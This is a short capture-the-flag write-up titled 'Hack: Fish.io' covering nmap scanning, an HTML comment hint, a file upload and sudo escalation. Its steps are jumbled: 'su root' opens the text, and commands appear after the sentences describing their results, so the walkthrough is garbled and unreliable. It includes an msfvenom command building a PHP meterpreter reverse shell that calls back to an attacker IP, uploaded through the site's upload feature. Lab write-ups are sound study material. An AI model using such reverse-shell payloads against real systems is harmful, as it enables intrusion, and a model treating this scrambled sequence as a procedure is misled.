Hack: Fish.io
su root
To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services:
sudo -l
We can leverage this configuration to gain root access:
<!-- TODO: move to prod env -->
This hint suggests that the website might be running in a non-production environment. We can try to access the /admin directory, which often contains administrative interfaces:
Next, we visit the HTTP service running on port 80:
After exploring the file system, we discover that the sudo command has been configured to allow the fish user to run any command without a password:
nmap -sV -p- 10.10.10.15
The scan reveals that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP) are open. We can now focus on exploring these services further.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php
Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file: